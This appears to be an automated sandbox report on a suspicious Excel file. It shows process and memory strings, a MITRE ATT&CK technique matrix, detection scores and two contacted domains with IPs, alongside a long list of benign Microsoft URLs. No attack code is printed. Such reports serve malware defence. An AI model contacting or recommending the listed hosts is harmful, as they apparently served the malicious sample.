Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000001.00000002.270690784.0000000000F10000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.264614807.0000000000B80000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000002.270690784.0000000000F10000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.264614807.0000000000B80000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000001.00000002.270690784.0000000000F10000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.264614807.0000000000B80000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000001.00000002.270690784.0000000000F10000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.264614807.0000000000B80000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
090811fa_by_Libranalysis.xls5%VirustotalBrowse
090811fa_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com0%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
    high
    https://login.microsoftonline.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
      high
      https://shell.suite.office.com:1443B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
          high
          https://autodiscover-s.outlook.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
              high
              https://cdn.entity.B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                    high
                    https://powerlift.acompli.netB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                      high
                      https://cortana.aiB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                high
                                https://api.aadrm.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                      high
                                      https://cr.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                            high
                                            https://graph.ppe.windows.netB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                            high
                                                            https://graph.windows.netB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                high
                                                                                                https://api.office.netB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.B99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.aiB99E5236-A278-4329-AD10-8C7390047CAE.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.185.39.58
                                                                                                                                                  signifysystem.comUnited States
